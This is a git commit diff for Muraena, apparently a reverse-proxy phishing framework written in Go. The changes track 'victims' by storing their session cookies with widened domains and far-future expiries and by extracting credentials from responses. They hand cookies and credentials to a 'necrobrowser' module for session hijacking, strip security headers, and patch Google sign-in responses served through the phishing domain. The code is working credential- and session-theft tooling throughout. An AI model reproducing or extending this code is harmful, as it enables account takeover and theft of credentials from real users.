Config refactoring and code adjustments

Ohpe 2024-03-06 21:57:03 +01:00
parent 33769c2c70
commit d51d8cd5ce
No known key found for this signature in database
21 changed files with 1131 additions and 408 deletions

View file

(binary image file changed; size 49 MiB both before and after; preview omitted)

View file

@ -36,7 +36,7 @@ type VictimCredential struct {
Time string `redis:"time"`
}
// VictimCookie: a victim has N cookies associated with its web session
// VictimCookie a victim has N cookies associated with its web session
// KEY scheme:
// victim:<ID>:cookiejar:<COOKIE_NAME>
type VictimCookie struct {
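
The key scheme above gives every victim cookie its own Redis hash. A minimal sketch of how such a key could be built and written, assuming a redigo-style client (the redis:"..." struct tags follow redigo's conventions); cookieKey and storeCookie are hypothetical helpers, not part of this commit:

package db

import (
    "fmt"

    "github.com/gomodule/redigo/redis"
)

// cookieKey builds the documented key: victim:<ID>:cookiejar:<COOKIE_NAME>.
func cookieKey(victimID, cookieName string) string {
    return fmt.Sprintf("victim:%s:cookiejar:%s", victimID, cookieName)
}

// storeCookie flattens a VictimCookie into the Redis hash under that key,
// relying on the redis:"..." field tags for the hash field names.
func storeCookie(conn redis.Conn, victimID string, c VictimCookie) error {
    args := redis.Args{}.Add(cookieKey(victimID, c.Name)).AddFlat(&c)
    _, err := conn.Do("HMSET", args...)
    return err
}
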

View file

@ -13,8 +13,6 @@ type Options struct {
ConfigFilePath *string
}
//var ErrInterrupt = errors.New("^C")
func ParseOptions() (Options, error) {
o := Options{
ConfigFilePath: flag.String("config", "", "Path to config file."),
@ -29,3 +27,14 @@ func ParseOptions() (Options, error) {
return o, nil
}
func GetDefaultOptions() Options {
return Options{
Verbose: &[]bool{false}[0],
Debug: &[]bool{false}[0],
Proxy: &[]bool{false}[0],
Version: &[]bool{false}[0],
NoColors: &[]bool{false}[0],
ConfigFilePath: &[]string{""}[0],
}
}
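
GetDefaultOptions uses the &[]bool{false}[0] construction to obtain pointers to literal values, matching the pointer fields that the flag package produces in ParseOptions. A sketch of the same defaults written with a small generic helper (requires Go 1.18+; ptr and defaultOptions are illustrative, not part of the commit):

// ptr returns a pointer to any literal value.
func ptr[T any](v T) *T { return &v }

// defaultOptions is equivalent to GetDefaultOptions above.
func defaultOptions() Options {
    return Options{
        Verbose:        ptr(false),
        Debug:          ptr(false),
        Proxy:          ptr(false),
        Version:        ptr(false),
        NoColors:       ptr(false),
        ConfigFilePath: ptr(""),
    }
}
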

View file

@ -1,6 +1,7 @@
package proxy
import (
"bufio"
"bytes"
"encoding/json"
"fmt"
@ -128,19 +129,11 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
// TRACKING
track := muraena.Tracker.TrackRequest(request)
// DROP
for _, drop := range sess.Config.Drop {
if request.URL.Path == drop.Path {
log.Debug("[Dropped] %s", request.URL.Path)
return
}
// If specified in the configuration, set the User-Agent header
if sess.Config.Transform.Request.UserAgent != "" {
request.Header.Set("User-Agent", sess.Config.Transform.Request.UserAgent)
}
//
// Garbage ..
//
// no garbage to remove in requests, for now ..
//
// HEADERS
//
@ -181,13 +174,55 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
}
}
// Track request cookies (if enabled)
if muraena.Session.Config.Tracking.TrackRequestCookies && track.IsValid() {
if len(request.Cookies()) > 0 {
// get victim:
victim, err := muraena.Tracker.GetVictim(track)
if err != nil {
log.Warning("%s", err)
} else {
// store cookies in the Victim object
for _, c := range request.Cookies() {
if c.Domain == "" {
c.Domain = request.Host
}
// remove any port from the cookie domain
c.Domain = strings.Split(c.Domain, ":")[0]
// make the cookie domain wildcard
subdomains := strings.Split(c.Domain, ".")
if len(subdomains) > 2 {
c.Domain = fmt.Sprintf("%s", strings.Join(subdomains[1:], "."))
} else {
c.Domain = fmt.Sprintf("%s", c.Domain)
}
sessCookie := db.VictimCookie{
Name: c.Name,
Value: c.Value,
Domain: c.Domain,
Path: "/",
HTTPOnly: false,
Secure: true,
Session: true,
SameSite: "None",
Expires: "2040-01-01 00:00:00 +0000 UTC",
}
muraena.Tracker.PushCookie(victim, sessCookie)
}
}
}
}
// Add extra HTTP headers
for _, header := range sess.Config.Craft.Add.Request.Headers {
for _, header := range sess.Config.Transform.Request.Add.Headers {
request.Header.Set(header.Name, header.Value)
}
// Log line
lhead := fmt.Sprintf("[%s]", getSenderIP(request))
lhead := fmt.Sprintf("[%s]", GetSenderIP(request))
if sess.Config.Tracking.Enabled {
lhead = fmt.Sprintf("[%*s]%s", track.TrackerLength, track.ID, lhead)
}
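
The request-cookie block above normalizes the cookie domain before storing it: any ":port" suffix is dropped and hosts with more than two labels are widened to their parent domain so the stored cookie also matches sibling subdomains. A standalone sketch of that normalization (normalizeCookieDomain is a hypothetical helper):

package proxy

import "strings"

// normalizeCookieDomain mirrors the logic above: strip the port, then widen
// deep hostnames to their parent domain.
// e.g. "login.sso.example.com:443" becomes "sso.example.com".
func normalizeCookieDomain(host string) string {
    domain := strings.Split(host, ":")[0]
    if labels := strings.Split(domain, "."); len(labels) > 2 {
        domain = strings.Join(labels[1:], ".")
    }
    return domain
}
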
@ -195,7 +230,7 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
l := fmt.Sprintf("%s [%s][%s%s%s]",
lhead,
Magenta(request.Method),
Magenta(sess.Config.Protocol), Yellow(request.Host), Cyan(request.URL.Path))
Magenta(sess.Config.Proxy.Protocol), Yellow(request.Host), Cyan(request.URL.Path))
if track.IsValid() {
log.Debug(l)
@ -204,7 +239,7 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
}
// Remove headers
for _, header := range sess.Config.Remove.Request.Headers {
for _, header := range sess.Config.Transform.Request.Remove.Headers {
request.Header.Del(header)
}
@ -213,7 +248,7 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
//
// If the requested resource extension is not relevant, skip body processing.
for _, extension := range sess.Config.SkipExtensions {
for _, extension := range sess.Config.Transform.Request.SkipExtensions {
if strings.HasSuffix(request.URL.Path, fmt.Sprintf(".%s", extension)) {
return
}
@ -237,14 +272,14 @@ func (muraena *MuraenaProxy) RequestProcessor(request *http.Request) (err error)
return nil
}
// getSenderIP returns the IP address of the client that sent the request.
// GetSenderIP returns the IP address of the client that sent the request.
// It checks the following headers in cascade order:
// - True-Client-IP
// - CF-Connecting-IP
// - X-Forwarded-For
// If none of the headers contain a valid IP, it falls back to RemoteAddr.
// TODO Update Watchdog to use this function
func getSenderIP(req *http.Request) string {
func GetSenderIP(req *http.Request) string {
// Define the headers to check in cascade order
headerNames := []string{"True-Client-IP", "CF-Connecting-IP", "X-Forwarded-For"}
@ -259,7 +294,7 @@ func getSenderIP(req *http.Request) string {
}
}
log.Debug("Sender IP not found in headers, falling back to RemoteAddr")
log.Verbose("Sender IP not found in headers, falling back to RemoteAddr")
// If none of the headers contain a valid IP, fall back to RemoteAddr
ipPort := req.RemoteAddr
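
GetSenderIP walks the proxy headers in a fixed order and only falls back to RemoteAddr when none of them carries a valid address. A condensed, self-contained sketch of that cascade (senderIP is an illustrative name; taking the left-most entry of an X-Forwarded-For list is an assumption, since the header-parsing part of the body is not shown in this hunk):

package proxy

import (
    "net"
    "net/http"
    "strings"
)

// senderIP checks True-Client-IP, CF-Connecting-IP and X-Forwarded-For in
// order, then falls back to the connection's RemoteAddr.
func senderIP(req *http.Request) string {
    for _, name := range []string{"True-Client-IP", "CF-Connecting-IP", "X-Forwarded-For"} {
        value := req.Header.Get(name)
        // X-Forwarded-For may hold a comma-separated list; the left-most
        // entry is the original client.
        candidate := strings.TrimSpace(strings.Split(value, ",")[0])
        if net.ParseIP(candidate) != nil {
            return candidate
        }
    }
    if host, _, err := net.SplitHostPort(req.RemoteAddr); err == nil {
        return host
    }
    return req.RemoteAddr
}
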
@ -277,14 +312,14 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
sess.Config.Transform.Base64.Padding,
}
if response.Request.Header.Get(muraena.Tracker.Landing) != "" {
if response.Request.Header.Get(muraena.Tracker.LandingHeader) != "" {
response.StatusCode = 302
response.Header.Add(muraena.Tracker.Header, response.Request.Header.Get(muraena.Tracker.Header))
response.Header.Add("Set-Cookie",
fmt.Sprintf("%s=%s; Domain=%s; Path=/; Expires=Wed, 30 Aug 2029 00:00:00 GMT",
muraena.Session.Config.Tracking.Identifier, response.Request.Header.Get(muraena.Tracker.Header),
muraena.Session.Config.Tracking.Trace.Identifier, response.Request.Header.Get(muraena.Tracker.Header),
muraena.Session.Config.Proxy.Phishing))
response.Header.Set("Location", response.Request.Header.Get(muraena.Tracker.Landing))
response.Header.Set("Location", response.Request.Header.Get(muraena.Tracker.LandingHeader))
return
}
@ -296,113 +331,60 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
//
// DROP
dropRequest := false
for _, drop := range sess.Config.Drop {
if response.Request.URL.Path == drop.Path && drop.RedirectTo != "" {
// if the response was for the dropped request
response.StatusCode = 302
response.Header.Set("Location", drop.RedirectTo)
log.Info("Dropped request %s redirected to: %s", drop.Path, drop.RedirectTo)
dropRequest = true
break
}
}
if dropRequest {
return
}
// dropRequest := false
//
// TODO: is this still needed? We redirect Requests in the RequestProcessor
// for _, drop := range sess.Config.Redirects {
//
// if drop.RedirectTo == "" {
// continue
// }
//
// // if the drop is empty, it means that we want to drop all the requests
// // and we don't want to redirect them
// if drop.Hostname == "" && drop.Path == "" && drop.Query == "" {
// continue
// }
//
// if drop.Hostname != "" && response.Request.Host != drop.Hostname {
// continue
// }
//
// if drop.Path != "" && response.Request.URL.Path != drop.Path {
// continue
// }
//
// if drop.Query != "" && response.Request.URL.RawQuery != drop.Query {
// continue
// }
//
// // Invalid HTTP code fallback to 302
// if drop.HTTPStatusCode == 0 {
// drop.HTTPStatusCode = 302
// }
//
// response.StatusCode = drop.HTTPStatusCode
// response.Header.Set("Location", drop.RedirectTo)
// log.Info("Dropped request %s redirected to: %s", drop.Path, drop.RedirectTo)
// // dropRequest = true
// // break
// return
// }
// if dropRequest {
// return
// }
// Add extra HTTP headers
for _, header := range sess.Config.Craft.Add.Response.Headers {
for _, header := range sess.Config.Transform.Response.Add.Headers {
response.Header.Set(header.Name, header.Value)
}
// Media Type handling.
// Prevent processing of unwanted media types
mediaType := strings.ToLower(response.Header.Get("Content-Type"))
for _, skip := range sess.Config.Transform.SkipContentType {
skip = strings.ToLower(skip)
if mediaType == skip {
return
}
if strings.HasSuffix(skip, "/*") &&
strings.Split(mediaType, "/")[0] == strings.Split(skip, "/*")[0] {
return
}
}
//
// Trace
//
victim := muraena.Tracker.TrackResponse(response)
if victim != nil {
// before transforming headers like cookies, store the cookies in the CookieJar
for _, c := range response.Cookies() {
if c.Domain == "" {
c.Domain = response.Request.Host
}
sessCookie := db.VictimCookie{
Name: c.Name,
Value: c.Value,
Domain: c.Domain,
Expires: c.Expires.String(), // will be set by necrobrowser
Path: c.Path,
HTTPOnly: c.HttpOnly,
Secure: c.Secure,
}
muraena.Tracker.PushCookie(victim, sessCookie)
}
if muraena.Session.Config.Tracking.Enabled && muraena.Session.Config.NecroBrowser.Enabled {
m, err := muraena.Session.Module("necrobrowser")
if err != nil {
log.Error("%s", err)
} else {
nb, ok := m.(*necrobrowser.Necrobrowser)
if ok {
getSession := false
for _, c := range muraena.Session.Config.Tracking.Urls.AuthSessionResponse {
if response.Request.URL.Path == c {
//log.Debug("Going to hijack response: %s (Victim: %+v)", response.Request.URL.Path, victim.ID)
getSession = true
break
}
}
if getSession {
// Pass credentials
creds, err := json.MarshalIndent(victim.Credentials, "", "\t")
if err != nil {
log.Warning(err.Error())
} else {
err := victim.GetVictimCookiejar()
if err != nil {
log.Error(err.Error())
} else {
go nb.Instrument(victim.ID, victim.Cookies, string(creds))
}
}
}
}
}
}
} else {
if len(response.Cookies()) > 0 {
log.Verbose("[TODO] Missing cookies to track: \n%s\n%+v", response.Request.URL, response.Cookies())
}
}
//
// HEADERS
//
// delete security headers
for _, header := range sess.Config.Remove.Response.Headers {
for _, header := range sess.Config.Transform.Response.Remove.Headers {
response.Header.Del(header)
}
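
The skipContentType check that moves in this commit (from Transform.SkipContentType to Transform.Response.SkipContentType) matches either the exact media type or a family wildcard such as image/*. A self-contained restatement of that test (skipContentType is a hypothetical helper):

package proxy

import "strings"

// skipContentType reports whether body processing should be skipped for the
// given Content-Type: an exact match or a "family/*" wildcard short-circuits.
func skipContentType(mediaType string, skipList []string) bool {
    mediaType = strings.ToLower(mediaType)
    for _, skip := range skipList {
        skip = strings.ToLower(skip)
        if mediaType == skip {
            return true
        }
        if strings.HasSuffix(skip, "/*") &&
            strings.Split(mediaType, "/")[0] == strings.TrimSuffix(skip, "/*") {
            return true
        }
    }
    return false
}
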
@ -423,14 +405,157 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
response.Header["Set-Cookie"][k] = strings.Replace(response.Header["Set-Cookie"][k], domain, newDomain, 1)
}
log.Debug("Set-Cookie: %s", response.Header["Set-Cookie"][k])
// Further, if the SameSite attribute is set in the configuration, we need to patch the cookie
if sess.Config.Transform.Response.Cookie.SameSite != "" {
cookie := response.Header["Set-Cookie"][k]
// if cookie contains SameSite (case insensitive)
samesite := ""
if strings.Contains(strings.ToLower(cookie), "samesite") {
samesite = strings.Split(cookie, "SameSite=")[1]
samesite = strings.Split(samesite, ";")[0]
}
if samesite != "" {
cookie = strings.Replace(cookie, samesite, sess.Config.Transform.Response.Cookie.SameSite, 1)
} else {
cookie = cookie + ";SameSite=" + sess.Config.Transform.Response.Cookie.SameSite
}
response.Header["Set-Cookie"][k] = cookie
}
log.Verbose("Set-Cookie: %s", response.Header["Set-Cookie"][k])
}
} else if header == "Location" {
// TODO: Cleanup this mess
//
// if len(replacer.SubdomainMap) > 0 {
// for _, m := range replacer.SubdomainMap {
// if strings.Contains(response.Header.Get(header), m[1]) {
// // replace only the first occurrence starting from the left
// response.Header.Set(header, strings.Replace(response.Header.Get(header), m[1], m[0], -1))
// break
// }
// }
// }
response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))
} else {
response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))
}
}
}
// Media LandingType handling.
// Prevent processing of unwanted media types
mediaType := strings.ToLower(response.Header.Get("Content-Type"))
for _, skip := range sess.Config.Transform.Response.SkipContentType {
skip = strings.ToLower(skip)
if mediaType == skip {
return
}
if strings.HasSuffix(skip, "/*") &&
strings.Split(mediaType, "/")[0] == strings.Split(skip, "/*")[0] {
return
}
}
//
// Trace
//
if muraena.Session.Config.Tracking.Enabled {
trace := muraena.Tracker.TrackResponse(response)
if trace.IsValid() {
var err error
victim, err := muraena.Tracker.GetVictim(trace)
if err != nil {
log.Warning("Error: cannot retrieve Victim from tracker: %s", err)
}
// victim := muraena.Tracker.TrackResponse(response)
if victim != nil {
// before transforming headers like cookies, store the cookies in the CookieJar
for _, c := range response.Cookies() {
if c.Domain == "" {
c.Domain = response.Request.Host
}
c.Domain = strings.Replace(c.Domain, ":443", "", -1)
sessCookie := db.VictimCookie{
Name: c.Name,
Value: c.Value,
Domain: c.Domain,
Expires: c.Expires.String(), // will be set by necrobrowser
Path: c.Path,
HTTPOnly: c.HttpOnly,
Secure: c.Secure,
}
muraena.Tracker.PushCookie(victim, sessCookie)
}
// Trace credentials
found, err := trace.ExtractCredentialsFromResponseHeaders(response)
if err != nil {
return errors.New(fmt.Sprintf("ExtractCredentialsFromResponseHeaders error: %s", err))
}
if found == true {
// muraena.Tracker.ShowVictims()
}
if muraena.Session.Config.Necrobrowser.Enabled {
m, err := muraena.Session.Module("necrobrowser")
if err != nil {
log.Error("%s", err)
} else {
nb, ok := m.(*necrobrowser.Necrobrowser)
if ok {
getSession := false
for _, c := range muraena.Session.Config.Necrobrowser.SensitiveLocations.AuthSessionResponse {
if response.Request.URL.Path == c {
// log.Debug("Going to hijack response: %s (Victim: %+v)", response.Request.URL.Path, victim.ID)
getSession = true
break
}
}
if getSession {
// Pass credentials
creds, err := json.MarshalIndent(victim.Credentials, "", "\t")
if err != nil {
log.Warning(err.Error())
} else {
err := victim.GetVictimCookiejar()
if err != nil {
log.Error(err.Error())
} else {
go nb.Instrument(victim.ID, victim.Cookies, string(creds))
}
}
}
}
}
}
} else {
if len(response.Cookies()) > 0 {
log.Verbose("[TODO] Missing cookies to track: \n%s\n%+v", response.Request.URL, response.Cookies())
}
}
}
}
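
Earlier in this hunk, when Transform.Response.Cookie.SameSite is set, each Set-Cookie header is rewritten so the attribute carries the configured value, either replacing an existing SameSite or appending one. A slightly defensive standalone variant (forceSameSite is a hypothetical helper; unlike the diff it splits on the exact "SameSite=" token instead of doing a separate case-insensitive check first, and it replaces the whole attribute rather than just its value):

package proxy

import "strings"

// forceSameSite rewrites a Set-Cookie header value so that its SameSite
// attribute equals sameSite, appending the attribute when it is missing.
// e.g. forceSameSite("id=abc; Path=/; SameSite=Lax", "None")
//      -> "id=abc; Path=/; SameSite=None"
func forceSameSite(setCookie, sameSite string) string {
    if parts := strings.SplitN(setCookie, "SameSite=", 2); len(parts) == 2 {
        current := strings.SplitN(parts[1], ";", 2)[0]
        return strings.Replace(setCookie, "SameSite="+current, "SameSite="+sameSite, 1)
    }
    return setCookie + "; SameSite=" + sameSite
}
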
//
// BODY
//
@ -444,12 +569,32 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
// process body and pack again
newBody := replacer.Transform(string(responseBuffer), false, base64)
//
// Ugly Google patch
//
// If request URL contains: AccountsSignInUi/data/batchexecute
// then go for another round of patches
if strings.Contains(response.Request.URL.Path, "AccountsSignInUi/data/batchexecute") {
// if body contains the phishing domain
if strings.Contains(newBody, muraena.Session.Config.Proxy.Phishing) {
// if body contains )]}'\n\n then patch it
if strings.HasPrefix(newBody, ")]}'\n\n") {
// fmt.Println("newBody: ", newBody)
newBody = patchGoogleStructs(newBody)
// fmt.Println("updated newBody: ", newBody)
}
}
}
err = modResponse.Encode([]byte(newBody))
if err != nil {
log.Info("Error processing the body: %+v", err)
return err
}
return nil
}
@ -487,10 +632,25 @@ func (init *MuraenaProxyInit) Spawn() *MuraenaProxy {
director := proxy.Director
proxy.Director = func(r *http.Request) {
// If request matches the redirect list, redirect it without processing
if redirect := muraena.getHTTPRedirect(r); redirect != nil {
// Retrieve the http.ResponseWriter from the context
if rw, ok := r.Context().Value(0).(http.ResponseWriter); ok {
http.Redirect(rw, r, redirect.RedirectTo, redirect.HTTPStatusCode)
} else {
log.Error("Failed to retrieve the http.ResponseWriter from the context")
}
return
}
if err = muraena.RequestProcessor(r); err != nil {
log.Error(err.Error())
return
}
// Send the request to the target
director(r)
}
proxy.ModifyResponse = muraena.ResponseProcessor
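
The new Director wrapper above answers redirect-list matches before any processing, but to do so it needs the http.ResponseWriter, which it reads from the request context with r.Context().Value(0). The side that stores the writer is not visible in this diff; a plausible counterpart, purely as an assumption, would be a wrapping handler like the following (withResponseWriter is hypothetical, and the untyped key 0 only mirrors the lookup in the diff; a dedicated unexported key type is the more idiomatic choice):

package proxy

import (
    "context"
    "net/http"
)

// withResponseWriter stores the ResponseWriter in the request context under
// key 0 so that code deeper in the proxy (such as the Director above) can
// issue a redirect directly.
func withResponseWriter(next http.Handler) http.Handler {
    return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        ctx := context.WithValue(r.Context(), 0, w)
        next.ServeHTTP(w, r.WithContext(ctx))
    })
}
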
@ -510,6 +670,37 @@ func (init *MuraenaProxyInit) Spawn() *MuraenaProxy {
return muraena
}
func (muraena *MuraenaProxy) getHTTPRedirect(request *http.Request) *session.Redirect {
for _, drop := range muraena.Session.Config.Redirects {
// Skip if Hostname is set and the request Hostname is different from the expected one
if drop.Hostname != "" && request.Host != drop.Hostname {
continue
}
// Skip if Path is set and the request Path is different from the expected one
if drop.Path != "" && request.URL.Path != drop.Path {
continue
}
// Skip if Query is set and the request Query is different from the expected one
if drop.Query != "" && request.URL.RawQuery != drop.Query {
continue
}
log.Info("[Dropped] %s", request.URL.String())
// Invalid HTTP code fallback to 302
if drop.HTTPStatusCode == 0 {
drop.HTTPStatusCode = 302
}
return &drop
}
return nil
}
func (st SessionType) HandleFood(response http.ResponseWriter, request *http.Request) {
var destination string
@ -521,21 +712,34 @@ func (st SessionType) HandleFood(response http.ResponseWriter, request *http.Req
ss, ok := m.(*statichttp.StaticHTTP)
if ok {
destination = ss.MakeDestinationURL(request.URL)
destination = ss.GetNewDestination(request.URL)
}
}
if destination == "" {
// CustomContent Subdomain Mapping
subs := strings.Split(request.Host, st.Replacer.Phishing)
if len(subs) > 1 {
sub := strings.Replace(subs[0], ".", "", -1)
for _, m := range st.Session.Config.Origins.SubdomainMap {
if m[0] == sub {
request.Host = fmt.Sprintf("%s.%s", m[1], st.Replacer.Phishing)
break
}
}
}
if strings.Contains(request.Host, st.Replacer.getCustomWildCardSeparator()) {
request.Host = st.Replacer.PatchComposedWildcardURL(request.Host)
}
if strings.HasPrefix(request.Host, st.Replacer.ExternalOriginPrefix) { //external domain mapping
if strings.HasPrefix(request.Host, st.Replacer.ExternalOriginPrefix) { // external domain mapping
for domain, subMapping := range st.Replacer.GetOrigins() {
// even if the resource is aa.bb.cc.dom.tld, the mapping is always one level as in www--2.phishing.tld.
// This is important since wildcard SSL certs do not handle N levels of nesting
if subMapping == strings.Split(request.Host, ".")[0] {
destination = fmt.Sprintf("%s%s", st.Session.Config.Protocol,
destination = fmt.Sprintf("%s%s", st.Session.Config.Proxy.Protocol,
strings.Replace(request.Host,
fmt.Sprintf("%s.%s", subMapping, st.Replacer.Phishing),
domain, -1))
@ -543,7 +747,7 @@ func (st SessionType) HandleFood(response http.ResponseWriter, request *http.Req
}
}
} else {
destination = fmt.Sprintf("%s%s", st.Session.Config.Protocol,
destination = fmt.Sprintf("%s%s", st.Session.Config.Proxy.Protocol,
strings.Replace(request.Host, st.Replacer.Phishing, st.Replacer.Target, -1))
}
}
@ -594,3 +798,47 @@ func (st SessionType) HandleFood(response http.ResponseWriter, request *http.Req
// has been slightly modified in the ServeHTTP method:
muraenaProxy.ReverseProxy.ServeHTTP(response, request)
}
// patchGoogleStructs is a temporary workaround for the Google Structs issue.
func patchGoogleStructs(input string) string {
var builder strings.Builder
// Splitting the input into sections and processing
scanner := bufio.NewScanner(strings.NewReader(input))
for scanner.Scan() {
line := scanner.Text()
// Check if the line is a number (size indicator)
if size, err := strconv.Atoi(line); err == nil {
// Read the next line (message content)
if scanner.Scan() {
message := scanner.Text()
// Calculate the new size including the newline characters
newSize := len(message) + 2 // +2 for the two newline characters
// Update the size if it's different
if newSize != size+1 {
fmt.Fprintln(&builder, newSize)
} else {
fmt.Fprintln(&builder, size)
}
// Print the message content
fmt.Fprintln(&builder, message)
} else {
// fmt.Fprintln(&builder, "Error: Expected message content after size indicator.")
return builder.String()
}
} else {
// Print non-size indicator lines as is
fmt.Fprintln(&builder, line)
}
}
if err := scanner.Err(); err != nil {
fmt.Fprintln(&builder, "Error reading input:", err)
}
return builder.String()
}
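
patchGoogleStructs deals with a payload format in which every message chunk is preceded by a line holding a byte count; once the replacer rewrites the chunk, the count no longer matches and has to be recomputed. A compact restatement of that idea (resizeChunks is illustrative and mirrors the +2 newline accounting used above; it is not the function from the commit):

package proxy

import (
    "bufio"
    "fmt"
    "strconv"
    "strings"
)

// resizeChunks walks alternating "length" and "message" lines and rebuilds
// each length line from the current message, so the prefixes stay consistent
// after the message text has been rewritten.
func resizeChunks(input string) string {
    var out strings.Builder
    sc := bufio.NewScanner(strings.NewReader(input))
    for sc.Scan() {
        line := sc.Text()
        if _, err := strconv.Atoi(line); err == nil && sc.Scan() {
            message := sc.Text()
            fmt.Fprintln(&out, len(message)+2) // +2 for the surrounding newlines
            fmt.Fprintln(&out, message)
            continue
        }
        fmt.Fprintln(&out, line)
    }
    return out.String()
}
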

View file

@ -27,6 +27,7 @@ type Replacer struct {
ExternalOriginPrefix string
Origins map[string]string
WildcardMapping map[string]string
SubdomainMap [][]string
CustomResponseTransformations [][]string
ForwardReplacements []string `json:"-"`
ForwardWildcardReplacements []string `json:"-"`
@ -39,10 +40,20 @@ type Replacer struct {
mu sync.RWMutex
}
// GetSessionFileName returns the session file name
// It derives the value from the Target domain, e.g. google.com becomes google.com.session.json
func (r *Replacer) GetSessionFileName() string {
return fmt.Sprintf("%s.session.json", r.Target)
}
// Init initializes the Replacer struct.
// If session.json is found, it loads the data from it.
// Otherwise, it creates a new Replacer struct.
func (r *Replacer) Init(s session.Session) error {
if r.Target == "" {
r.Target = s.Config.Proxy.Target
}
err := r.Load()
if err != nil {
log.Debug("Error loading replacer: %s", err)
@ -58,17 +69,18 @@ func (r *Replacer) Init(s session.Session) error {
}
if r.ExternalOriginPrefix == "" {
r.ExternalOriginPrefix = s.Config.Crawler.ExternalOriginPrefix
r.ExternalOriginPrefix = s.Config.Origins.ExternalOriginPrefix
}
r.SetExternalOrigins(s.Config.Crawler.ExternalOrigins)
r.SetOrigins(s.Config.Crawler.OriginsMapping)
r.SubdomainMap = s.Config.Origins.SubdomainMap
r.SetExternalOrigins(s.Config.Origins.ExternalOrigins)
r.SetOrigins(s.Config.Origins.OriginsMapping)
if err = r.DomainMapping(); err != nil {
return err
}
r.SetCustomResponseTransformations(s.Config.Transform.Response.Custom)
r.SetCustomResponseTransformations(s.Config.Transform.Response.CustomContent)
r.MakeReplacements()
// Save the replacer
@ -327,7 +339,9 @@ func contains(slice []string, s string) bool {
func (r *Replacer) Save() error {
r.mu.Lock()
defer r.mu.Unlock()
return saveToJSON(ReplaceFile, r)
return saveToJSON(r.GetSessionFileName(), r)
// return saveToJSON(ReplaceFile, r)
}
// saveToJSON saves the Replacer struct to a file as JSON.
@ -341,7 +355,8 @@ func saveToJSON(filename string, replacer *Replacer) error {
// Load loads the Replacer data from a JSON file.
func (r *Replacer) Load() error {
rep, err := loadFromJSON(ReplaceFile)
rep, err := loadFromJSON(r.GetSessionFileName())
// rep, err := loadFromJSON(ReplaceFile)
if err != nil {
return err
}
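
Save and Load now key the persisted replacer state on the target domain via GetSessionFileName instead of the fixed ReplaceFile. The bodies of saveToJSON and loadFromJSON are not part of this hunk; a minimal shape consistent with the signature shown in the hunk header above would be (sketch only, using encoding/json and os):

package proxy

import (
    "encoding/json"
    "os"
)

// saveToJSONSketch writes the Replacer as indented JSON to filename.
func saveToJSONSketch(filename string, replacer *Replacer) error {
    data, err := json.MarshalIndent(replacer, "", "  ")
    if err != nil {
        return err
    }
    return os.WriteFile(filename, data, 0644)
}

// loadFromJSONSketch reads a previously saved Replacer back from filename.
func loadFromJSONSketch(filename string) (*Replacer, error) {
    data, err := os.ReadFile(filename)
    if err != nil {
        return nil, err
    }
    r := &Replacer{}
    return r, json.Unmarshal(data, r)
}
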

View file

@ -31,7 +31,15 @@ type muraenaServer struct {
NetListener net.Listener
}
func (server *tlsServer) serveTLS() (err error) {
func (server *tlsServer) serveTLS(sslkeylog string) (err error) {
// Panic recovery
defer func() {
if err := recover(); err != nil {
log.Warning("Recovered from panic: %s", err)
}
}()
server.Config.Certificates[0], err = tls.X509KeyPair([]byte(server.Cert), []byte(server.Key))
if err != nil {
return err
@ -45,6 +53,19 @@ func (server *tlsServer) serveTLS() (err error) {
server.Config.ClientCAs = certpool
}
if sslkeylog != "" {
// Open the file in append mode, create it if it doesn't exist, with write-only permissions
f, err := os.OpenFile(sslkeylog, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
// defer f.Close() // Ensure file is closed when function exits
if err != nil {
log.Error(err.Error())
} else {
_, _ = fmt.Fprintf(f, "# SSL/TLS secrets log file, generated by Muraena\n")
server.Config.KeyLogWriter = f
}
}
tlsListener := tls.NewListener(server.NetListener, server.Config)
return server.Serve(tlsListener)
}
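
The new sslkeylog parameter wires an NSS-format key log file into the TLS listener: Go's crypto/tls writes session secrets to Config.KeyLogWriter, which lets tools such as Wireshark decrypt captured proxy traffic. A standalone illustration (path and permissions are illustrative; as in the diff, the file is intentionally left open for the lifetime of the server):

package proxy

import (
    "crypto/tls"
    "os"
)

// keyLogConfig returns a tls.Config whose session secrets are appended to the
// given NSS key log file.
func keyLogConfig(path string) (*tls.Config, error) {
    f, err := os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0600)
    if err != nil {
        return nil, err
    }
    return &tls.Config{KeyLogWriter: f}, nil
}
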
@ -60,7 +81,7 @@ func Run(sess *session.Session) {
}
//
// Start the reverse proxy
// start the reverse proxy
//
http.HandleFunc("/", func(response http.ResponseWriter, request *http.Request) {
@ -135,7 +156,12 @@ func Run(sess *session.Session) {
}
server := &http.Server{Handler: RedirectToHTTPS(sess.Config.Proxy.Port)}
go server.Serve(newNetListener)
go func() {
err := server.Serve(newNetListener)
if err != nil {
log.Fatal("Error binding Muraena on HTTP: %s", err)
}
}()
}
// Attach TLS configurations to muraena server
@ -148,7 +174,8 @@ func Run(sess *session.Session) {
Config: sess.GetTLSClientConfig(),
}
if err := tlsServer.serveTLS(); core.IsError(err) {
if err := tlsServer.serveTLS(cTLS.SSLKeyLog); core.IsError(err) {
log.Fatal("Error binding Muraena on HTTPS: %s", err)
}
}

View file

@ -42,8 +42,16 @@ type Base64 struct {
// TODO: the b64 can be set into the Replacer struct
func (r *Replacer) Transform(input string, forward bool, b64 Base64, repetitions ...int) (result string) {
source := strings.TrimSpace(input)
if source == "" {
// Panic recovery
defer func() {
if err := recover(); err != nil {
log.Warning("Recovered from panic: %s", err)
}
}()
// source := strings.TrimSpace(input)
source := input
if strings.TrimSpace(input) == "" {
return source
}
@ -281,7 +289,7 @@ func (r *Replacer) PatchComposedWildcardURL(URL string) (result string) {
if strings.Contains(result, r.Phishing+"/") {
path = "/" + strings.Split(result, r.Phishing+"/")[1]
}
//wildcard = strings.TrimSuffix(wildcard, fmt.Sprintf(".%s", r.Phishing))
